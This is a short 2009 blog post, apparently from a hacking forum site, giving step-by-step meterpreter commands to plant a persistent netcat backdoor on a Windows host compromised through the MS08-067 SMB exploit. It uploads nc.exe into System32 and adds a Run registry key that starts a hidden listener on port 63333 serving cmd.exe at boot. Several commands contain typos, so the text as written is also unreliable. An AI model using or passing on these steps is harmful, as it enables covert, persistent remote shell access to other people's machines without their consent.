Menu

Aug 31, 2009

Create a netcat backdoor using Metasploit


/* IT Security ® 
   Pesents : 
Create a NC bacdoor via msf meterprent

*/
------------------------------
# Author : 7h3-bi0w0rm
# web : www.security-sh3ll.com
# greetZ : Pentest,sp1r1t,Xylitol & all Security-Shell members
------------------------------
i use :
Exploit : windows/smb/ms08_067_netapi
Payload : indows/meterpreter/bind_tcp
------------
upload C:\\dir\\nc.exe C:\\Windows\\Sustem32\\

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\Curr entVersion\\Run

reg setval -k HKLM\\Software\\Microsoft\\Windows\\Curr entVersion\\Run -v nc -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 63333 -e cmd.exe"

reg queryval -k HKLM\\Software\\Microsoft\\Windows\\Curr entVersion\\Run -v nc
------------
video here : 

No comments:

Post a Comment